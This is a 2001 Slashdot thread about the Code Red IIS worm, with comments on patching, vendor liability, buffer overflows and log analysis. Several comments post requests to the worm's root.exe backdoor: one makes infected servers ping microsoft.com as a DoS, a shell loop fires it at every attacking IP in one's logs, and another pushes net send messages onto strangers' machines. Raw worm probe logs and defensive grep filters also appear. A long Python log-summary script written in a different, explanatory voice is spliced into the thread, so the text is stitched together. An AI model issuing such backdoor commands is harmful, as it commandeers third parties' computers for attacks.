      Sysadmins aren't entirely at fault. Certainly, this particular problem has received enough coverage that there really shouldn't be any unpatched IIS installations any more (but there are, sigh), but the other side is that it's pretty near impossible to keep up with every patch to every system.

      Here's a good rant on the subject entitled The Security Patch Treadmill. It was written in March 2001, before Code Red. It still applies. A quote:

      Those who manage computer networks are people too, and people don't always do the smartest thing. They know they're supposed to install all patches. But sometimes they can't take critical systems off-line. Sometimes they don't have the staffing available to patch every system on their network. Sometimes applying a patch breaks something else on their network. I think it's time the industry realized that expecting the patch process to improve network security just doesn't work.
      --

      Computers are useless. They can only give you answers. -- Pablo Picasso

    13. Re:Stop addressing Code Red by nether · · Score: 1

      Take note that the patch is vulnerable. If your server is redirecting URLs, then the patch will not work for you. Take a look here: http://archives.neohapsis.com/archives/incidents/2001-08/0218.html

    14. Re:Stop addressing Code Red by why-is-it · · Score: 1

      Microsoft (or any other software company) should be responsible for selling defective products

      Read the EULA. Their products are sold without any sort of warranty (real or implied) and by clicking I accept the user agrees not to hold micro$oft liable for anything.

      --
      *** Where are we going? And what's with this handbasket?
  145. Re:Is this a trick from Hollywood? by tsa · · Score: 1

    You should watch more movies.

    --

    -- Cheers!

  146. Re:Microsoft should be sued by daviddennis · · Score: 2

    As you must know, their own license agreement says they cannot be sued for their software, and that all you have really bought is a funny-looking silver coaster and a piece of paper or two.

    This industry as a whole is a castle of sand with the tide rapidly coming in, but nobody cares to admit it.

    D

  147. Pretty devastating DoS attack in the making by Bonker · · Score: 2

    GET /scripts/root.exe?/c+ping+"www.microsoft.com"+"-t -l 4096 -i 9999"

    Let's see just how many boxen we can get slamming MS at once...

    --
    The next Slashdot story will be ready soon, but subscribers can beat the rush and slashdot the links early!
    1. Re:Pretty devastating DoS attack in the making by crouchingpenguin · · Score: 1
      if you have the GET perl script or equiv, this might be fun:
      for address in `zgrep 'default\.ida\?' access.log* |awk '{print $1}' |cut -f2 -d':'`;do GET http://$address/scripts/root.exe?/c+ping+"www.micr osoft.com"+"-t -l 4096 -i 9999";done
    2. Re:Pretty devestating DoS attack in the making by sfe_software · · Score: 1

      This would be cool, except that microsoft.com's firewall drops ICMP packets -- eg, you can't ping them.

      - Jman

      --
      NGWave - Fast Sound Editor for Windows
  148. The Code Red hype Hall of Shame by wiredog · · Score: 5, Informative
  149. Can't wait for WinXP by telbij · · Score: 1

    Although I can't say I agree with the tactics, these MS attacking virii may be the best advertisement for OSS in years. I wonder if that's the motivation behind them, or if it's just random delinquency :) I can't wait to see the crackers feast on Win XP.

  150. Re:ok you bigots :) by Anonymous Coward · · Score: 0

    grep -ic default.ida /var/log/httpd-errors.log (how many hits are you at now?)

  151. Re:Put it in another log and forget about it. by Sauron23 · · Score: 1

    I found this on the securityfocus mailing list:

    cat error_log error_log.1 | grep 'default.ida' | awk '{print $8 " " $1 " " $2 " " $3 " " $4 " " $5}' | sed s/[][]/" "/g > myreport.txt

    Which then really begs the question: now what should I do with this list of compromised machines? Oh, never mind...

  152. Re:Microsoft should be sued by Syberghost · · Score: 2

    And what do you do if your server runs third-party software that can't run with Service Pack 6?

    Microsoft unfortunately has chosen to integrate IIS so tightly with the operating system, that to upgrade one is to upgrade the other.

    Some folks are in a real pickle, and don't have the knowledge to get out of it in a short period of time.

  153. Re:Code Red 'counter' by Asgard · · Score: 2, Informative
    DShield.org, a distributed IDS, would like you to do the following:

    grep 'default.ida' access_log | mail -s 'APACHE' redalert@dshield.org

    They use this information to notify the owners of the machines of the infection and to track the progression of the worm.
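The one-liners in comments 151 and 153 pull the default.ida hits straight out of the log. As an added example (not code from any poster or from DShield), here is a small Python script that does the same extraction over constructed Apache access_log lines and aggregates per source host, with first/last seen and a count per request type, which is the per-host summary an abuse desk or DShield report wants. The filler-letter distinction between variants follows the thread's "the XXXXX one" naming; the real probe URI is far longer than the constructed sample.

```python
"""Summarise Code Red probes from an Apache access_log (added example)."""
import re
from collections import defaultdict

# Constructed sample log lines (documentation-range hosts, not real ones).
# The probe is a GET for /default.ida? followed by a long filler run; the
# sample keeps the filler short for readability.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Aug/2001:12:01:17 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 290
10.0.0.5 - - [04/Aug/2001:12:03:40 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 290
192.0.2.77 - - [04/Aug/2001:13:15:02 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 290
198.51.100.9 - - [04/Aug/2001:13:20:55 -0400] "GET /index.html HTTP/1.1" 200 1532
192.0.2.77 - - [04/Aug/2001:14:02:11 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 291
"""

# Common/combined log format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

PROBE_PATH = "/default.ida?"        # the .ida ISAPI overflow probe the thread discusses
BACKDOOR_PATH = "/scripts/root.exe"  # the root.exe backdoor mentioned in comments 127/147


def classify(uri):
    """Label a request URI, or return None if it is not worm-related."""
    if uri.startswith(PROBE_PATH):
        filler = uri[len(PROBE_PATH):len(PROBE_PATH) + 1]
        # The original worm filled with 'N'; the thread calls the later
        # variant "the XXXXX one". Anything else is flagged but not named.
        if filler == "N":
            return "ida-probe-N"
        if filler == "X":
            return "ida-probe-X"
        return "ida-probe-other"
    if uri.startswith(BACKDOOR_PATH):
        # A host asking our server for root.exe is looking for already
        # compromised boxes; worth reporting alongside the probes.
        return "backdoor-request"
    return None


def parse_line(line):
    """Return the log fields as a dict, or None for a line that does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def summarise(lines):
    """Map source host -> {"hits": {label: count}, "first": ts, "last": ts}."""
    report = defaultdict(lambda: {"hits": defaultdict(int), "first": None, "last": None})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify(rec["uri"])
        if label is None:
            continue  # ordinary traffic, ignore
        entry = report[rec["host"]]
        entry["hits"][label] += 1
        if entry["first"] is None:
            entry["first"] = rec["time"]
        entry["last"] = rec["time"]  # log is in time order
    return {h: {"hits": dict(e["hits"]), "first": e["first"], "last": e["last"]}
            for h, e in report.items()}


def format_report(report):
    """One line per host, suitable for mailing to an abuse desk or DShield."""
    out = []
    for host in sorted(report):
        e = report[host]
        counts = ", ".join(f"{k}={v}" for k, v in sorted(e["hits"].items()))
        out.append(f"{host} first={e['first']} last={e['last']} {counts}")
    return "\n".join(out)


if __name__ == "__main__":
    print(format_report(summarise(SAMPLE_LOG.splitlines())))
```

Feed it a real log with `summarise(open("access_log"))`; hosts that never requested default.ida or root.exe are dropped from the report.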

  154. It would backfire by snilloc · · Score: 1
    Ford was trying to counteract negative press by shifting the blame to Firestone.

    Gates holding a press conference about Code Red would only hurt his PR - it would burst the PR bubble he's been taking advantage of: "Computer worm" vs. "Microsoft worm".

    Plus, what else is MSFT supposed to do? A (partial?) patch is already out. Gates can't say "we're doing everything we can" because it would imply that he can do more, and that MSFT is at fault. It would only enhance the association of Code Red with MS.

    1. Re:It would backfire by Tony-A · · Score: 1

      Besides, it seems that Microsoft can't even patch their own servers. MS internal network whacked by Code Red

  155. Re:It's not like they haven't announced the patch by b1t+r0t · · Score: 2
    There's also the subtle difference that flaws in Microsoft products don't kill people.

    Yet.

    The US Navy is giving it a good try, though.

    --
    "Open source is good." - Steve Jobs
    "Open source is evil." - Microsoft
  156. Re:Buffer overflow vulnerabilities by Macrobat · · Score: 0, Interesting

    Tell you what. Show me the source for an OS coded in Java, I'll see if I can't find buffer overflow risks in it.

    --
    "Hardly used" will not fetch you a better price for your brain.
  157. no ... its more like by ReidMaynard · · Score: 1

    you bought a submarine with screen doors.

    Anyone who builds a sub should realise it will be under water.

    Anyone who develops OS/Server code should realise it will be under attack.

    --
    -- www.globaltics.net

    Political discussion for a new world

  158. Re:Microsoft should be sued by Ummagumma · · Score: 1

    I totally disagree here. When you buy a car, no one tells you that it has the potential to kill people, if used improperly, or not taken care of. Same thing applies here. It's time for people to start taking responsibility for their own actions (inactions), and not pointing the finger elsewhere. The sysadmins (yes, even the cablemodem people who simply installed the software and walked away) are the responsible parties here.

    --
    "The natural progress of things is for liberty to yield and government to gain ground." - Thomas Jefferson
  159. Re:Why people love Code Red by Anonymous Coward · · Score: 0

    You -- like everybody else -- know exactly jack shit about who writes this stuff.

  160. Python has no buffer overflow problems. by Russ+Nelson · · Score: 1, Flamebait

    Python has no buffer overflow problems. Neither does Perl. Okay, so .... what does that tell you? Is this something that has "always been a problem in people's code."? Or is it something in the C library that encourages buffer overflows?
    -russ

    --
    Don't piss off The Angry Economist
    1. Re:Python has no buffer overflow problems. by Anonymous Coward · · Score: 0

      Yes and no. Part of the problem is C in that there is no bounds checking as a feature of the language. The other part of the problem is that certain libraries do have bounds checking as a feature of the library. Solaris 8 allows the executable stack to be shut off which is a feature of the OS.
      The attitude to take with C is that it allows you to build a secure library. If you build a car with no locks it is not the fault of the raw materials which in this case is the primitive C language all on its own.

    2. Re:Python has no buffer overflow problems. by Russ+Nelson · · Score: 2

      Nahhahhh. Dan Bernstein uses a different C library in his programs like qmail and djbdns and manages to avoid shooting himself in the root.
      -russ

      --
      Don't piss off The Angry Economist
    3. Re:Python has no buffer overflow problems. by greenrd · · Score: 1
      It's not something in the C library, it's something in C itself - it allows you to shoot yourself in the foot very easily. Which can be a good thing or a bad thing, but mostly, I think, a bad thing.

  161. Re:I saw that Reuters story earlier by Anonymous Coward · · Score: 0

    Of course it will work fine on a cable network..you can block the MAC address of the cable modem itself. Poof! Gone. RoadRunner definitely has the capability to do this.

  162. Re:M*derators! by cyberdonny · · Score: 1, Offtopic
    > Why is that moderated to 0, Troll? That was both funny as hell, and a good idea!

    Your post seems to have been moderated down as well. This seems to happen very often with posts discussing moderation. It's so common, it's almost caricatural: apparently some moderators can't stand it if you question their moderation skills. If anybody from the Slashdot crew is reading this, may I propose the following safeguard against such moderation abuses:

    • If a post has moderator (case insensitive) in the title, and...
    • ... a moderator has already moderated any direct or indirect parent of said post...
    • ... then the same moderator cannot moderate this post.
    It would be relatively safe against abuse (for example, just putting moderators in the title of posts linking to a certain well-known site on the Christmas Islands...) as all the other moderators could still mod it down. Only the moderators who have modded down or up one of the parents would be barred.

    As an addition, we could remove Offtopic from the moderation menu for any "moderators" post. Although discussion about moderation is not, strictly speaking, on topic, I think these meta-discussions are still justified. You would still be able to moderate them down as Flamebait or Troll, just not as Offtopic (as long of course, as you didn't mod a parent).

  163. Re:Saddens me though by TheMidget · · Score: 1
    > Linux and Apache are compatible. I'm running Apache on Linux right now. :)

    The comment you were replying to was moderated as funny, so it must be some kind of joke. Don't worry though, I don't get the joke either... Or is this just a parody of the "The next version of Linux will support SCSI", "Linux doesn't have a GUI", "Word is so much better at typesetting math than LaTeX" or "IE outperforms all Linux browsers, even when running in VMware" type affirmations that you still occasionally see in some trade rags of ill repute?

  164. Why people love Code Red by Laplace · · Score: 2, Insightful
    The newsmakers love it because they get to print lots of muckraking headlines about "another hacker threat," and the "evil red chinese attack on the good guys." A scary computer virus means ratings!

    Microsoft loves it because they get to release patches, and proclaim to the world "we're the good guys, protecting you from those unamerican people who share code!"

    The lawmakers get shits and giggles because now they have a reason to pass new, more restrictive laws regarding communication across "the information superhighway."

    The prison system salivates over this sort of stuff. It creates more potential for 15 year old kids to be thrown in prison for essentially victimless crimes. Nothing like young ass for the seasoned prison rapists!

    Open source fanatics get another nit to pick with big bad Microsoft. Go free software! No, go open source! No, go free software!

    News like this is the best kind around.

    --
    The middle mind speaks!
    1. Re:Why people love Code Red by spack · · Score: 1

      It really turns my stomach when I think about how close to the truth your statement is. My hope from all this is that it will convince more people/admins/companies/etc to try Linux. It's just a hope.

      --
      For those who fight for it, life has a flavor the sheltered will never know.
    2. Re:Why people love Code Red by aozilla · · Score: 1

      If one of them breaks into a system and destroys data or defaces a Web site, what do you propose we do with him?

      Nothing. You should have a backup.

      Alternatively, if the victim wants to hire a private investigator to catch the kid, and then file a civil lawsuit against him, I'm fine with that. But I don't want my tax money paying for your stupidity. You'll get no help from the DA, no help from the FBI, no help from any law enforcement, you can pay for the court costs yourself (possibly getting it back from the kid if you win the lawsuit and he's not broke), and you won't get my money to feed this kid and put bars around him.

      Don't go and compare this to someone whose house is broken into because s/he didn't lock the door. First of all, there is physical harm involved. Secondly, it is impossible to guard 100% against a physical break in. Whereas an electronic break-in is trivial to guard against.

      --
      ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
    3. Re:Why people love Code Red by SomeoneYouDontKnow · · Score: 2

      Are you saying that writing and distributing viruses is a victimless crime? Try telling that to someone whose system has just been wiped out.

      IMHO, if the little snot-nosed 15-year-old script kiddies don't know what they're doing is wrong, then some time in the can might be just what they need. I love it when people try to excuse their behavior by saying they lack social skills and need direction to give them a sense of morality. No, these kids do what they do because they think they'll get away with it and that there'll be no consequences for them. Let them face the music. If that means some jail time, so be it.

      --
      That light you see at the end of the tunnel might be from an oncoming train.
    4. Re:Why people love Code Red by aozilla · · Score: 1

      It's impossible to guard 100% against any kind of break-in.

      Absolutely positively untrue. Don't connect the machine to the internet. That guards 100% against an electronic break-in over the internet (which is what we're talking about here).

      What's that, you want to allow people to connect to your machine? OK. What do you want to let them do? For any set of things you want to allow them to do, it is possible to set the machine up so that nothing else is possible.

      You say a physical break-in is different than an electronic one because there's damage in a physical break-in and not in an electronic one. How is the damage different?

      I guess the physicalness isn't the difference. One could argue that the bits on the hard drive are physical. Certainly hooking up your computer to a hammer which breaks your windows if you send it the proper code is physical. The difference is that you are explicitly enabling the damage. If I tell you that if you send me an email I'm going to format my hard drive, should it be illegal for you to send me an email? What if I set up a script which does that automatically?

      I have a natural right to be secure in my home. I have a natural right to have my property in my home be secure. I am willing to pay taxes to the government to secure my natural rights and the natural rights of others. I don't have a natural right to run a web server. I don't expect the government to help me run a web server, and I do not want to pay taxes to the government to help others run a web server.

      Suppose someone was able to hack a computer at your local power company and black out half the state?

      The power company should be sued for negligence. There is no reason for it to be hooked up to the internet, and I highly doubt it is.

      Suppose someone launches a DoS attack against your ISP for a day, and your Internet access is rendered useless.

      Read your contract. There is probably no responsibility on the part of the ISP. As for the ISP, they can feel free to sue the person if they catch him/her.

      Suppose someone mailbombs you because they got pissed off with something you said on a newsgroup. I've been through that, too. Even if there's no physical damage, there's damage caused by wasted time and productivity.

      Suppose there's an earthquake and all my windows break? It's not my responsibility to fix your windows. That's what better windows and insurance is for. You shouldn't set up a server which allows an unlimited number of anonymous emails to be sent to you if that's not what you want to allow. If you want to guard against your own mistakes, feel free to buy insurance.

      If you're worried that he won't have the money to pay, then also worry about the victims of such attacks who don't have the money to bankroll their own investigations.

      That's what insurance is for. Like I said, I don't feel I have an obligation to help you run a webserver.

      --
      ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
    5. Re:Why people love Code Red by SomeoneYouDontKnow · · Score: 2

      Perhaps you weren't paying attention to this thread and what I was commenting on. Read more carefully before you post.

      But since you brought it up, perhaps you'll enlighten everyone here as to who's writing this stuff. And be sure to use lots of small words so we'll understand.

      --
      That light you see at the end of the tunnel might be from an oncoming train.
    6. Re:Why people love Code Red by Afrosheen · · Score: 1

      "Are you saying that writing and distributing viruses is a victimless crime?"
      Virii, maybe. Worms that target easily cracked M$ servers...maybe not.
      If that means some jail time, so be it.
      Jail is the answer for everything isn't it? I suppose it has nothing to do with the breakdown of society to the point where nobody is supervising children while they learn to write and distribute virii/worms. Blame the parents, even if they're 'technically illiterate'. It's their job to get literate. Would you buy your kid a car if you didn't know how to drive one?

    7. Re:Why people love Code Red by shepd · · Score: 1

      Do what people always used to do when kids were bad, or made mistakes. Make the kid pay for the damage, literally.

      The teenager could:

      - Repair the webserver they trashed (under supervision). This would be good experience and would direct the teenager's "hacking" abilities in an appropriate direction. This is only good for a minor offense, as the average script kiddie isn't going to have the slightest clue about setting up a real server. This option also forces the teen to learn through personal experience what damage their acts cause (I wouldn't be surprised if script kiddies are thinking about the thrill of the hack, rather than the consequences when they hack -- this might make them do the latter).

      You need to take more caution with that option than the latter. The teenager might enjoy the punishment and become worse. Perhaps making them do volunteer technical support for the company would be less enjoyable? :-)

      or:

      - Pay for the repair. Make the teenager get a job, and hold it long enough to pay a couple of thousand dollars for repairs and perhaps they might learn some respect for others' property through "hard time". This is a little more foolproof.

      It's only if options like that fail that they need to see some more serious punishments, IMHO.

      It's like a kid breaking a window. The first time the parents should make the kid apologize for doing it and the parents should pay for the repair. The second time the kid pays for the repair. The third time... well, I don't know. I don't think there's usually a third time for a well balanced kid.

      --
      If you could be told what you can see or read, then it follows that you could be told what to say or think - BoC
    8. Re:Why people love Code Red by Anonymous Coward · · Score: 0

      You say a physical break-in is different than an electronic one because there's damage in a physical break-in and not in an electronic one. How is the damage different?

      Another point to consider is that if the two acts are identical (more specifically, if one is a subset of the other), why do we need a law against both of them?

    9. Re:Why people love Code Red by tapin · · Score: 1
      Of course virus writing is a victimless crime. Like punching someone in the dark.

      -Tapin (ha-ha!) Muntz.

  165. Verizon DSL by asmithmd1 · · Score: 1

    I talked to the Verizon support center and they told me port 80 into their network will be blocked until the code red worm dies down, probably 2-3 weeks, but that is not a commitment. I then asked to be released from my year long contract I signed to get a free DSL modem and web cam since they broke their contract (no changes in service without 7 weeks notice) and they said no, cancellation charges would still apply. Anyone starting a class action suit?

  166. Re:CodeRed Information by baptiste · · Score: 2
    It was also mentioned yesterday that NT4 servers that have been patched are still vulnerable to CR2 if they're using redirection. This seems odd to me

    Seems odd to me too since Code Red II (not CRv2) can't infect NT servers - it just crashes them when it tries to run due to a bogus jump table that only works with Win 2K.

    From the Code Red II analysis: This worm, like the original Code Red worm, will only exploit Windows 2000 web servers because it overwrites EIP with a jmp that is only correct under Windows 2000. Under NT4.0 etc... that offset is different so, the process will simply crash instead of allowing the worm to infect the system and spread.

  167. Please stop bragging about apache... by wrinkledshirt · · Score: 0
    Crackers are fueled by the challenge and payoff of getting into what was once considered the uncrackable site. The higher the profile, the better, that's one of the reasons MS software is such a target. Start talking trash about how IIS sucks compared to apache and methinks you'll end up with more security hole notices about apache than you'd like, courtesy some guy who enjoys dealing with hubris.

    --

    --------
    Bleah! Heh heh heh... BLEAH BLEAH!!! Ha ha ha ha...

    1. Re:Please stop bragging about apache... by Anonymous Coward · · Score: 0

      Um, have you heard about this Code Red thing yet?

    2. Re:Please stop bragging about apache... by MaxwellStreet · · Score: 1
      See? If I were a virus-writer motivated as you described, I'd most certainly go after the world's most popular web server.

      An Apache server is more than twice as common as one running IIS - hard to imagine any web server higher profile than that.

      And hubris? People have been talking smack about IIS for years here. But that mythical guy "enjoys dealing with hubris" will never find an example more egregious or tempting than the Gates/Ballmer/Mundie/Microsoft machine.

    3. Re:Please stop bragging about apache... by Anonymous Coward · · Score: 1, Insightful
      The higher the profile, the better, that's one of the reasons MS software is such a target.

      Windows gets targeted because it's the most common OS. Apache is the most common web server; why isn't Apache targeted? MS isn't known for its great security or reliability; why is it always the MS product that gets hit with a virus/worm? Because it's easy.

  168. Perhaps this is what we need by Anonymous Coward · · Score: 0

    I wonder if that gentleman at the Ministry of Information will be providing us with Kwang-sup Grade 11...

  169. Suite? by Anonymous Coward · · Score: 0

    Is that when all the plaintifs have to stay in the same hotel room?

  170. So hard to keep up by snakecoder · · Score: 5, Funny

    God, I'm still on version 1 of code red. Does anybody know where I can download the latest version? Is there a mail list I can get on so I know I have the latest version on my IIS server?
    Thanks.

    --
    -Nuke the moon
  171. Re:Someone should post the IP addresses. by gleam_mn · · Score: 1

    Screw'em! Can someone please just release a new CR version that contains the IPs of the unpatched servers so that when they all switch from infect to attack mode they can just DDOS each other to death. If you haven't patched your server by now then I hope it catches fire!

    --
    - The auditors said to secure the server... hand me that duct-tape -
  172. Re:Microsoft should be sued by djocyko · · Score: 2, Insightful

    To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected.

    From: Support@iis.microsoft.com
    To: Registered_Users@iis.microsoft.com
    CC:
    Subject: RE: IIS Code Red Worm Patch
    Attachment: Instructions.doc
    Body:

    Hi, how are you?

    We are writing you in response to the Code Red worm that has recently attacked our premium enterprise gold standard web portal system, Microsoft Internet Information Server. We have compiled a set of directions for patching the server, and have included these instructions in an easy-to-read Word document. If MS Outlook didn't automagically open this attachment for you, double click on the attachment link above.

    If you have any advice on this file, please email us back!

    See you later!

  173. Code Red Vigilante by Anonymous Coward · · Score: 0

    There's a Java program that emulates IIS servers and waits for a GET /default.ida request and then warns them. It exploits their security hole to do a net send from their local machine to themselves, explaining that they are victims of Code Red, with a link to visit to fix it. Here is the link for the program: http://www.dynwebdev.com/codered/

  174. Re:Buffer overflow vulnerabilities by mpe · · Score: 2

    The buffer overflow we're talking about is not in an OS kernel (Windows), but in an application (the IIS webserver), for chrissakes!

    How big a distinction does Microsoft draw between "kernel" and "application" anyway? After all they are always on about "integration"...

  175. Re:Perhaps REAL Damage will Fix the Problem by mpe · · Score: 2

    What we really need is a variant of Code Red that completely hoses any computer that it hits -- something that people can't overlook.

    It can't do this too quickly or it wouldn't get that many of them. Also people would just reformat and reinstall. "Evolution" doesn't work very well with "reincarnation" :)

  176. Here's an awkscript to profile unique CR attacks by sanermind · · Score: 1

    Try this little awkscript:

    grep "default.ida" /var/log/http/access_log | awk '/XXXXX/ { cr[$1]=$4"\tCodeRedII" } /NNNNN/ { cr[$1]=$4"\tCodeRed_Original" } END { for (x in cr) print x"\t"cr[x] }' > codered_analysis

    This creates a file, codered_analysis, which contains each unique attacking host only once, with the most recent attack time. This way, you can look at the attacking machines without duplications, and can also `wc' the file to see how many unique ones have hit you.

    Plus, it detects the difference between CR1 and CR2 too!

    --

    ---
    the pen is mightier than the sword, the sword is mightier than the court, the court is mightier than the pen.
  177. Interesting log entry by Anonymous Coward · · Score: 0

    There is an entry in my apache access log as follows: authorized-scan1.security.home.net - - [09/Aug/2001:15:41:08 -0700] "HEAD" 400 -

  178. Re:make some money off banner ads by Anonymous Coward · · Score: 0

    Yup we all can see that. Hopefully you get over it and move to a less challenging career like janitorial work.

  179. Re:Is this a trick from Hollywood? by Anonymous Coward · · Score: 0
    No trick. Apparently some really big companies are being hammered by this too. A large networking company from up North apparently had IIS running by default in the images of Win 2K it installed on new laptops and desktops - promotes employee collaboration, etc. Now, understand that their intranet is pretty much walled off from incoming traffic. But somehow Code Red II got in, either via a suspended infected laptop or a VPN split tunnel (infection comes in and goes out the IPSec tunnel). Apparently their network went nuts as all these Win 2K boxes on very close networks started hammering the hell out of each other @ 10-100MBps switched.

    Needless to say they disabled split VPN tunnels, but by then it was too late. It took them days to get it under control.

  180. Re:Microsoft should be sued by IronChef · · Score: 3, Insightful


    I'm a gun nut, but even I will say that a maker of a defective gun should be liable. If it explodes in your hand, that's an issue. IIS is exploding in a way, and MS should be liable.

    My view is very simple: Things you buy shouldn't suck.

  181. Re:Buffer overflow vulnerabilities by Macrobat · · Score: 1
    True. I was, however, responding more to the original poster, loki4eng:

    Is what happens when you code your OS in C++. Sorry all you C++ dudes, but you know it's true.


    --in my rush to defend the language, I got suckered into responding to someone who's either a script kiddie or a troll, or both.
    --
    "Hardly used" will not fetch you a better price for your brain.
  182. Re:It's not like they haven't announced the patch by phutureboy · · Score: 1

    Hehe. That reminds me of something that I just saw in the bank drive-thru.

    There are these little video screens on each of the whooshy-tube things you pull up to. They normally cycle through a whole bunch of ads for the bank's latest products and services. This time, however, there was a Powerpoint error message on the screen. Something or other about 'Powerpoint has encountered an error it cannot fix. Please close the application and restart.'

    Well, I found it amusing.

  183. Something different in my apache logs by Anonymous Coward · · Score: 0

    I have several different entries in my Apache logs: it is the XXXXXXXX string without the default.ida listed in it; the entire string is all XXXs, with the same code following the string as in the original default.ida/NNNN and default.ida/XXXXX requests. Just wondering if anyone else has seen this.

  184. Re:Serious blow to open source & free software by Anonymous Coward · · Score: 0

    you ain't kidding. read this gem at:
    http://cnet.com/enterprise/0-9566-7-4561136.html

    "While it may seem that the fault lies in IIS, these security flaws still don't suggest that another Web server will offer appreciably tighter security. Paul Robichaux of Robichaux & Associates, a security consultant and columnist for Microsoft's TechNet, says Windows 2000-based Web servers aren't any more vulnerable than other Web servers. All Web servers have security holes. Carnegie-Mellon University's CERT Coordination Center, a site devoted to improving Internet security, is a good indicator of the extent of Web security problems. The site reports on security breaches that plague virtually all Web server and related products.

    What might make IIS 5.0 more prone to reveal its vulnerabilities than alternative Web servers such as Apache, may be--ironically--its popularity. It's likely that IIS's high visibility as Microsoft's flagship Internet product is reason enough to attract the attention of a lot of hackers.

    So the bad news is that simply by running IIS you may be more likely to fall into a hacker's sights. The good news is that you can button up your IIS installation and foil the hackers."

    They quote a columnist for Microsoft's TechNET who makes the false claim that IIS is more popular than apache, and attributes the widespread exploits to that (false) popularity!

  185. Re:Back Door? Somebody call the Goatse.cx guy! by Tackhead · · Score: 2, Funny
    >My question here is, how the hell do you have a 'wider' backdoor than that?!

    Well, suppose we had this giant electronic speculum ;-)

  186. Code Red Cannot Be Stopped by (void*) · · Score: 2

    Kyle Reese: This code red virus, It's out there, looking for your IIS server. It feels no passion, no sympathy or remorse. It can't be bargained or reasoned with. It's just going to come for you, unless you can stop it yourself.

  187. More fun by Anonymous Coward · · Score: 0

    Windows net send messages can go to the whole domain, but this limits them to 128 characters. My modification to WebSnarf.pl makes a get request to "/scripts/root.exe?/c+net+send+%userdomain%+%22%CO MPUTERNAME%+is+infected+with+codered+and+attacked+ me.+Fix+it.%22"

  188. Re:Buffer overflow vulnerabilities by jilles · · Score: 2, Insightful

    Ah, coding practices. Sorry, Murphy's law, you know. If it can go wrong it will go wrong (and he proves himself right a lot lately). That's why even programs that have been around since the early days of UNIX are sometimes caught with their pants down (recent BIND bug, anyone?).

    Any manual check can be forgotten and be a potential security hole. Once it is forgotten it merely depends on who finds the hole first: script kiddie or code maintainer.

    And let's rub this in deeply: there are plenty of languages that protect you against the single most frequent cause of security leaks that is costing the world billions of dollars in damage annually (and it sure isn't C). Any program that is going to be exposed to hackers (i.e. any internet server software) should never ever be programmed in C. You simply cannot guarantee that the compiler and libraries are correct. Even if your program is correct, those still can be a potential source of bugs. Your average UNIX system likely has dozens of undiscovered potential buffer overflows.

    Us Java programmers are laughing our asses off each time a buffer overflow is wreaking havoc on the internet. We don't have to worry about such things. Java may not be the greatest thing, but you can rest assured that buffer overflows won't happen.

    --

    Jilles
  189. Re:As with the parent, so with the child. by pmorrison · · Score: 2, Funny

    True... and the Code Red Resource Kit, the Code Red SDK, 'Programming Code Red', 'Inside Code Red', and, through IDG, 'Code Red for Dummies'!

  190. The patch *was* announced by ferkelparade · · Score: 1

    Alright, I'm not a big fan of MS either, but it must be said in all fairness that both the vulnerability and the patch were announced very early by Microsoft on their security bulletin newsletter. Subscribing to that newsletter is a matter of seconds, you don't even have to be a registered customer or anything (see here)
    They sent out a warning to remove the isapi mappings the same day Code Red was discovered, and as soon as the patch was out, they sent out a notification...premier customers also received a mail message about a week later, but at that time, our servers were already patched :) It has been said too often already, but the main responsibility lies with admins who don't care to install patches and with clueless home users who don't even know they have a web server running...

    --
    frotz grue
  191. Could this be it? by ecki · · Score: 2, Interesting
    Found a lot of those in my access.log...:

    NN.NN.NN.NN - - [10/Aug/2001:04:11:20 -0700] "GET / HTTP/1.0" 200 7023
    NN.NN.NN.NN - - [10/Aug/2001:04:11:20 -0700] "GET /753f7d950154aaec...1cc7 HTTP/1.0" 404 258
    NN.NN.NN.NN - - [10/Aug/2001:04:11:20 -0700] "GET /scripts/root.exe HTTP/1.0" 404 210
    NN.NN.NN.NN - - [10/Aug/2001:04:11:21 -0700] "GET /MSADC/root.exe HTTP/1.0" 404 208
    NN.NN.NN.NN - - [10/Aug/2001:04:11:21 -0700] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 404 218
    NN.NN.NN.NN - - [10/Aug/2001:04:11:25 -0700] "GET /d/winnt/system32/cmd.exe HTTP/1.0" 404 218
    NN.NN.NN.NN - - [10/Aug/2001:04:11:26 -0700] "GET /NULL.ida?http-42.AAAAAA...AAAAAAAAA=X HTTP/1.1" 404 214
    NN.NN.NN.NN - - [10/Aug/2001:04:11:29 -0700] "GET / HTTP/1.0" 200 7023
    NN.NN.NN.NN - - [10/Aug/2001:04:11:30 -0700] "GET /NULL.idq?http-42.AAAAAAAA...AAAAAAAA=X HTTP/1.1" 404 214
    NN.NN.NN.NN - - [10/Aug/2001:04:11:33 -0700] "GET / HTTP/1.0" 200 7023

    Or is there somebody trying to exploit the CodeRed backdoors? Mind you, this is within a supposedly protected firewall.

    1. Re:Could this be it? by linuxrochester · · Score: 0

      If your firewall has port 80 open, then the server behind the firewall is open to attack.

  192. Anxiously awaiting... by Anonymous Coward · · Score: 0

    ...Code Red XP and Code Red.NET

  193. Re:Saddens me though by egburr · · Score: 1
    Linux and Apache are compatible. I'm running Apache on Linux right now. :)

    Yes. I do know what was intended. But, it's fun to take things too literally occasionally.

    --

    Edward Burr
    Having a smoking section in a restaurant is like having a peeing section in a swimming pool.
  194. Re:Help me out on this one... by warrior · · Score: 1

    What kind of server buffer handler would execute the content of the buffer?

    That's not exactly what happens. Once the buffer overflow has occurred, the server is no longer in control. What happens is that the buffer overflow causes the stack pointer on the CPU to be overwritten, and so now the returning jump from the function is at a new address -- usually the address of a system call to get a root shell, etc. This is known as "smashing the stack".

    --
    Intel transfer the difficult from Hadware to software, for get more power, programmer need more technology. -- chinaitn
  195. Re:make some money off banner ads by ekrout · · Score: 0, Flamebait
